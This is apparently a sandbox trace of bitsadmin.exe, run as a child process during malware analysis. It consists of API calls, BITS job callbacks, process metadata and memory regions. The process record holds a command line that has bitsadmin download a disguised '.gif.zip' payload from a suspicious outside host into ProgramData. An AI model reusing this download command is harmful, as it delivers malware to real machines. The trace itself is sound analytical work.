[0065.839] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x16ed78, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed78*=0x10) returned 1
[0065.840] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.840] _vsnwprintf (in: _Buffer=0x16eb8c, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x16eb44 | out: _Buffer="2 Seconds") returned 9
[0065.840] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16eda4 | out: lpConsoleScreenBufferInfo=0x16eda4) returned 1
[0065.840] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x16edbc, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16edbc*=0x9) returned 1
[0065.840] CoTaskMemFree (pv=0x2583d0)
[0065.841] PeekMessageW (in: lpMsg=0x16f718, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f718) returned 0
[0065.841] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x16f740*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0066.350] PeekMessageW (in: lpMsg=0x16f718, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f718) returned 1
[0066.350] TranslateMessage (lpMsg=0x16f718) returned 0
[0066.350] DispatchMessageW (lpMsg=0x16f718) returned 0x1
[0066.350] IBackgroundCopyCallback:JobModification (This=0x260cc0, pJob=0x24a6bc, dwReserved=0x0) returned 0x0
[0066.350] IBackgroundCopyJob:GetState (in: This=0x24a62c, pVal=0x260ccc | out: pVal=0x260ccc) returned 0x0
[0066.351] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc5
[0066.351] IBackgroundCopyJob:GetType (in: This=0x24a62c, pVal=0x16ede0 | out: pVal=0x16ede0) returned 0x0
[0066.352] IBackgroundCopyJob:GetProgress (in: This=0x24a62c, pVal=0x260cd0 | out: pVal=0x260cd0) returned 0x0
[0066.353] IBackgroundCopyJob:GetPriority (in: This=0x24a62c, pVal=0x16eddc | out: pVal=0x16eddc) returned 0x0
[0066.353] CoTaskMemFree (pv=0x0)
[0066.354] IBackgroundCopyJob:GetDisplayName (in: This=0x24a62c, pVal=0x16edf4 | out: pVal=0x16edf4*="msd5") returned 0x0
[0066.354] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed9c | out: lpConsoleScreenBufferInfo=0x16ed9c) returned 1
[0066.354] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x16edb4 | out: lpNumberOfCharsWritten=0x16edb4) returned 1
[0066.355] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x16edb4 | out: lpNumberOfAttrsWritten=0x16edb4) returned 1
[0066.355] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0066.355] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.355] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed88 | out: lpConsoleScreenBufferInfo=0x16ed88) returned 1
[0066.355] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16eda0, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda0*=0xa) returned 1
[0066.362] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.363] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed84 | out: lpConsoleScreenBufferInfo=0x16ed84) returned 1
[0066.363] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16ed9c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed9c*=0x5) returned 1
[0066.363] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.363] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed8c | out: lpConsoleScreenBufferInfo=0x16ed8c) returned 1
[0066.363] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x16eda4, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda4*=0x7) returned 1
[0066.364] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.364] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed80 | out: lpConsoleScreenBufferInfo=0x16ed80) returned 1
[0066.364] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed98, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed98*=0x8) returned 1
[0066.364] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.364] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed88 | out: lpConsoleScreenBufferInfo=0x16ed88) returned 1
[0066.365] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16eda0, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda0*=0x8) returned 1
[0066.365] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.365] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed7c | out: lpConsoleScreenBufferInfo=0x16ed7c) returned 1
[0066.365] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x16ed94, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed94*=0xe) returned 1
[0066.365] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.366] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed8c | out: lpConsoleScreenBufferInfo=0x16ed8c) returned 1
[0066.366] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16eda4, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda4*=0xa) returned 1
[0066.366] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.366] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed74 | out: lpConsoleScreenBufferInfo=0x16ed74) returned 1
[0066.366] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16ed8c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed8c*=0xa) returned 1
[0066.367] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.367] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed7c | out: lpConsoleScreenBufferInfo=0x16ed7c) returned 1
[0066.367] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed94, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed94*=0x8) returned 1
[0066.367] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.368] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16eda0 | out: _Buffer="0") returned 1
[0066.368] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16edac | out: _Buffer="1") returned 1
[0066.368] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed7c | out: lpConsoleScreenBufferInfo=0x16ed7c) returned 1
[0066.368] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16ed94, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed94*=0x5) returned 1
[0066.368] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.368] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed84 | out: lpConsoleScreenBufferInfo=0x16ed84) returned 1
[0066.368] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed9c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed9c*=0x8) returned 1
[0066.369] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.369] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16eda8 | out: _Buffer="776470") returned 6
[0066.369] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16edac | out: _Buffer="937984") returned 6
[0066.369] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16eda8 | out: _Buffer="82") returned 2
[0066.369] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16ed94 | out: lpSystemTimeAsFileTime=0x16ed94*(dwLowDateTime=0xd838c310, dwHighDateTime=0x1d469c7))
[0066.369] _finite (_X=0x942f5c42) returned 1
[0066.369] _finite (_X=0x7c1cdd70) returned 1
[0066.369] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed54 | out: lpConsoleScreenBufferInfo=0x16ed54) returned 1
[0066.369] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x16ed6c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed6c*=0x17) returned 1
[0066.369] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.370] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed60 | out: lpConsoleScreenBufferInfo=0x16ed60) returned 1
[0066.370] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x16ed78, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed78*=0xf) returned 1
[0066.370] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.370] _vsnwprintf (in: _Buffer=0x16eb8c, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x16eb50 | out: _Buffer="773.22 KB/S") returned 11
[0066.370] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed58 | out: lpConsoleScreenBufferInfo=0x16ed58) returned 1
[0066.371] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x16ed70, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed70*=0xc) returned 1
[0066.371] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.371] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed60 | out: lpConsoleScreenBufferInfo=0x16ed60) returned 1
[0066.371] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x16ed78, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed78*=0x10) returned 1
[0066.371] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.372] _vsnwprintf (in: _Buffer=0x16eb8c, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x16eb44 | out: _Buffer="0 Seconds") returned 9
[0066.372] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16eda4 | out: lpConsoleScreenBufferInfo=0x16eda4) returned 1
[0066.372] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x16edbc, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16edbc*=0x9) returned 1
[0066.372] CoTaskMemFree (pv=0x2583d0)
[0066.373] PeekMessageW (in: lpMsg=0x16f718, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f718) returned 0
[0066.373] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x16f740*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0066.470] PeekMessageW (in: lpMsg=0x16f718, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f718) returned 1
[0066.470] TranslateMessage (lpMsg=0x16f718) returned 0
[0066.470] DispatchMessageW (lpMsg=0x16f718) returned 0x1
[0066.470] IBackgroundCopyCallback:JobTransferred (This=0x260cc0, pJob=0x24a6bc) returned 0x0
[0066.470] KillTimer (hWnd=0x0, uIDEvent=0x7fc5) returned 1
[0066.470] IBackgroundCopyJob:GetState (in: This=0x24a62c, pVal=0x260ccc | out: pVal=0x260ccc) returned 0x0
[0066.471] IBackgroundCopyCallback:JobModification (This=0x260cc0, pJob=0x24a6bc, dwReserved=0x0) returned 0x0
[0066.471] IBackgroundCopyJob:GetState (in: This=0x24a62c, pVal=0x260ccc | out: pVal=0x260ccc) returned 0x0
[0066.472] IBackgroundCopyJob:GetType (in: This=0x24a62c, pVal=0x16dd50 | out: pVal=0x16dd50) returned 0x0
[0066.473] IBackgroundCopyJob:GetProgress (in: This=0x24a62c, pVal=0x260cd0 | out: pVal=0x260cd0) returned 0x0
[0066.473] IBackgroundCopyJob:GetPriority (in: This=0x24a62c, pVal=0x16dd4c | out: pVal=0x16dd4c) returned 0x0
[0066.474] CoTaskMemFree (pv=0x0)
[0066.474] IBackgroundCopyJob:GetDisplayName (in: This=0x24a62c, pVal=0x16dd64 | out: pVal=0x16dd64*="msd5") returned 0x0
[0066.475] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dd0c | out: lpConsoleScreenBufferInfo=0x16dd0c) returned 1
[0066.475] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x16dd24 | out: lpNumberOfCharsWritten=0x16dd24) returned 1
[0066.475] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x16dd24 | out: lpNumberOfAttrsWritten=0x16dd24) returned 1
[0066.476] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0066.476] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.476] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcf8 | out: lpConsoleScreenBufferInfo=0x16dcf8) returned 1
[0066.476] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16dd10, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd10*=0xa) returned 1
[0066.477] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.477] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcf4 | out: lpConsoleScreenBufferInfo=0x16dcf4) returned 1
[0066.477] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16dd0c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd0c*=0x5) returned 1
[0066.477] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.477] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcfc | out: lpConsoleScreenBufferInfo=0x16dcfc) returned 1
[0066.478] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x16dd14, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd14*=0x7) returned 1
[0066.478] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcf0 | out: lpConsoleScreenBufferInfo=0x16dcf0) returned 1
[0066.478] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16dd08, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd08*=0x8) returned 1
[0066.479] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.479] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcf8 | out: lpConsoleScreenBufferInfo=0x16dcf8) returned 1
[0066.479] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16dd10, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd10*=0x8) returned 1
[0066.479] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.479] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcec | out: lpConsoleScreenBufferInfo=0x16dcec) returned 1
[0066.480] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x16dd04, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd04*=0xd) returned 1
[0066.480] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.480] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcfc | out: lpConsoleScreenBufferInfo=0x16dcfc) returned 1
[0066.480] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16dd14, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd14*=0xa) returned 1
[0066.481] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.481] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dce4 | out: lpConsoleScreenBufferInfo=0x16dce4) returned 1
[0066.481] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16dcfc, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dcfc*=0xa) returned 1
[0066.481] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.481] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcec | out: lpConsoleScreenBufferInfo=0x16dcec) returned 1
[0066.482] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16dd04, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd04*=0x8) returned 1
[0066.482] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.482] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16dd10 | out: _Buffer="1") returned 1
[0066.482] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16dd1c | out: _Buffer="1") returned 1
[0066.482] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcec | out: lpConsoleScreenBufferInfo=0x16dcec) returned 1
[0066.482] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16dd04, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd04*=0x5) returned 1
[0066.483] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.483] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcf4 | out: lpConsoleScreenBufferInfo=0x16dcf4) returned 1
[0066.483] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16dd0c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd0c*=0x8) returned 1
[0066.483] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.484] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16dd18 | out: _Buffer="937984") returned 6
[0066.484] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16dd1c | out: _Buffer="937984") returned 6
[0066.484] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16dd18 | out: _Buffer="100") returned 3
[0066.484] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dd14 | out: lpConsoleScreenBufferInfo=0x16dd14) returned 1
[0066.484] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x16dd2c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd2c*=0x16) returned 1
[0066.484] CoTaskMemFree (pv=0x2583d0)
[0066.484] IBackgroundCopyJob:Complete (This=0x24a62c) returned 0x0
[0066.491] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dd18 | out: lpConsoleScreenBufferInfo=0x16dd18) returned 1
[0066.492] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcec | out: lpConsoleScreenBufferInfo=0x16dcec) returned 1
[0066.492] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16dd04, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd04*=0x2) returned 1
[0066.492] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dcec | out: lpConsoleScreenBufferInfo=0x16dcec) returned 1
[0066.492] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x16dd04, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16dd04*=0x14) returned 1
[0066.492] GetCurrentThreadId () returned 0xbdc
[0066.493] PostThreadMessageW (idThread=0xbdc, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0066.493] PeekMessageW (in: lpMsg=0x16f718, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f718) returned 1
[0066.493] IUnknown:Release (This=0x24a62c) returned 0x1
[0066.493] IUnknown:Release (This=0x24a554) returned 0x0
[0066.494] CoUninitialize ()
[0066.494] IUnknown:Release (This=0x260cc0) returned 0x2
[0066.494] IUnknown:Release (This=0x260cc0) returned 0x1
[0066.494] IUnknown:Release (This=0x260cc0) returned 0x0
[0066.494] IUnknown:Release (This=0x24a62c) returned 0x1
[0066.494] CoTaskMemFree (pv=0x260cc0)
[0066.500] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0066.500] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0066.500] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.500] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0066.500] CloseHandle (hObject=0x80) returned 1
[0066.500] exit (_Code=0)
Thread:
id = 130
os_tid = 0xbf0
Thread:
id = 131
os_tid = 0xbf4
Thread:
id = 132
os_tid = 0xbf8
Thread:
id = 133
os_tid = 0xbfc
Process:
id = "11"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be620"
os_pid = "0xc08"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdx.gif.zip?258277672 C:\\ProgramData\\tempa\\marxvxinhhmdx.gif"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1354
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1355
start_va = 0x30000
end_va = 0x6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1356
start_va = 0x70000
end_va = 0x73fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 1357
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 1358
start_va = 0xbf0000
end_va = 0xc33fff
entry_point = 0xbf0000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1359
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1360
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1361
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1362
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1363
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1364
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
